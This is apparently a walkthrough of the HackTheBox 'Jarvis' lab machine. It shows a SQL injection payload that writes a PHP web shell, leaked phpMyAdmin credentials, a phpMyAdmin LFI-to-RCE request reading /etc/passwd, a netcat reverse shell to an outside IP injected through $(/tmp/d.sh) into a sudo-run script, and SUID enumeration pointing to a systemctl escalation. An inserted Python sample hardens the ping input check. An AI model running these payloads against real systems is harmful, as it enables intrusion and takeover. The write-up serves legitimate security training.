HTB Jarvis

Web Content Discovery

After discovering the additional page room.php, we can find a SQL injection in this website.

Sql Injection

Using sqlmap, we find that the cod parameter is vulnerable.

phpmyadmin
Username: DBadmin
Password: imissyou

  1. We can log in to phpmyadmin with this password.
  2. A smarter approach is to write a malicious PHP page into the web content directory through the SQL injection (the outfile path is quoted so MySQL treats it as a string):
cod=-1 union select 1,'<?php system($_GET[1]); ?>',3,4,5,6,7 into outfile '/var/www/html/cmd.php'

phpmyadmin 4.8.0 Exploit

phpMyAdmin 4.8.1 LFI to RCE Vulnerability
https://www.vulnspy.com/phpmyadmin-4.8.1/
https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e

http://10.10.10.143/phpmyadmin/index.php?target=server_sql.php%253f../../../../../../../etc/passwd

Now, I’ll include my PHP session file. I’ll check Burp to grab my phpMyAdmin cookie, and visit:

http://10.10.10.143/phpmyadmin/index.php?cmd=id&target=db_sql.php%3f/../../../../../var/lib/php/sessions/sess_e3qctegac4saf72rocbl1541j26u7mqm

www-data shell

By changing the cmd parameter, we can get a www-data shell.

Enhance your shell

With either shell, I’ll upgrade with the standard technique:

  1. python -c 'import pty;pty.spawn("bash")'
  2. [ctrl-z] to background shell
  3. stty raw -echo
  4. fg
  5. reset
  6. Enter screen if asked for a terminal type.

Priv: www-data -> pepper

Run sudo -l to check what commands I can run as other, higher-privileged users.

Command Injection

Then we find the vulnerable function exec_ping in simpler.py.

www-data@jarvis:/tmp$ echo -e '#!/bin/bash\n\nnc -e /bin/bash 10.10.16.2 9002'
#!/bin/bash

nc -e /bin/bash 10.10.16.2 9002
www-data@jarvis:/tmp$
www-data@jarvis:/tmp$ echo -e '#!/bin/bash\n\nnc -e /bin/bash 10.10.14.8 443' > /tmp/d.sh
www-data@jarvis:/tmp$ chmod +x /tmp/d.sh
www-data@jarvis:/tmp$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
     _                 _
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
                                @ironhackers.es

***********************************************

Enter an IP: $(/tmp/d.sh)

I got the pepper shell.
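A hardened version of the exec_ping pattern, as an added example that is not the box's simpler.py (its source is not shown here): validate the target as a literal IP address and run ping with an argument list, so an input like $(/tmp/d.sh) is rejected before any shell could expand it. The sample inputs below are constructed for the demonstration.

```python
import ipaddress
import subprocess

# Constructed sample inputs for the "Enter an IP" prompt, including the command
# substitution used above to reach a shell as pepper.
SAMPLE_INPUTS = [
    "10.10.14.8",
    "$(/tmp/d.sh)",
    "127.0.0.1; id",
    "`id`",
]


def is_plain_ip(value: str) -> bool:
    """True only for a syntactically valid IPv4/IPv6 address and nothing else.

    An allowlist check like this rejects every shell metacharacter by construction,
    which is far more robust than trying to deny individual characters.
    """
    try:
        ipaddress.ip_address(value.strip())
    except ValueError:
        return False
    return True


def build_ping_argv(target: str, count: int = 1) -> list:
    """Hypothetical hardened replacement for an exec_ping-style helper: validate the
    target, then build an argv list. Raises ValueError instead of reaching a shell."""
    if not is_plain_ip(target):
        raise ValueError("refusing to ping a non-IP target: %r" % target)
    return ["ping", "-c", str(count), target.strip()]


def safe_exec_ping(target: str) -> str:
    """Run ping without shell=True: the argv list is never re-parsed by a shell,
    so $(...), backticks and ';' in the input can never become commands."""
    argv = build_ping_argv(target)
    completed = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return completed.stdout


def classify(inputs: list) -> dict:
    """Map each candidate input to whether the allowlist would accept it."""
    return {value: is_plain_ip(value) for value in inputs}
```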

Privilege escalation

find / -perm -4000 2>/dev/null
[-] SUID files:
-rwsr-xr-x 1 root root 44304 Mar  7  2018 /bin/mount
-rwsr-xr-x 1 root root 61240 Nov 10  2016 /bin/ping
-rwsr-x--- 1 root pepper 174520 Feb 17 03:22 /bin/systemctl
-rwsr-xr-x 1 root root 31720 Mar  7  2018 /bin/umount
-rwsr-xr-x 1 root root 40536 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 40312 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59680 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75792 May 17  2017 /usr/bin/gpasswd

https://gtfobins.github.io/gtfobins/systemctl/